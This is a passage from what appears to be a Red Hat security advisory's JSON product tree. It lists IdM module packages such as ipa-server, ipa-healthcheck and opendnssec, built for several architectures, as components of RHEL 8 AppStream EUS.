"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1"
},
"product_reference": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client"
},
"product_reference": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client"
},
"product_reference": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1"
},
"product_reference": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client"
},
"product_reference": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client"
},
"product_reference": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
